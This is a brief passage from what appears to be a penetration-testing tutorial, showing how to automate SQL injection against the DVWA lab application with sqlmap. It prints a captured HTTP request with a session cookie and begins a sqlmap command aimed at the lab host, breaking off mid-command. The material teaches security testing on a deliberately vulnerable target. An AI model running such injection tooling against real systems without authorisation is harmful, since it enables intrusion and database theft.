Automation
There are tools to automate SQL injection, detection, and exploitation. Just for further review, we are going to show how to exploit the same vulnerability using sqlmap, which is a tool focused on SQL injection vulnerabilities.
First, we need to extract the request sent by the application to the server. Using an HTTP proxy, we get it:
GET /dvwa/vulnerabilities/sqli/?id=cosa&Submit=Submit HTTP/1.1Host: 192.168.1.72User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: security=low; PHPSESSID=os91d50l1vbbipkvk7v0id7he2Upgrade-Insecure-Requests: 1Cache-Control: max-age=0
Now, we are going to launch sqlmap from a command line using the parameters in the request and the following command:
sqlmap.py -u "http://192.168.1.72:80/dvwa/vulnerabilities/sqli/?id=cosa^&Submit=Submit" --cookie="security...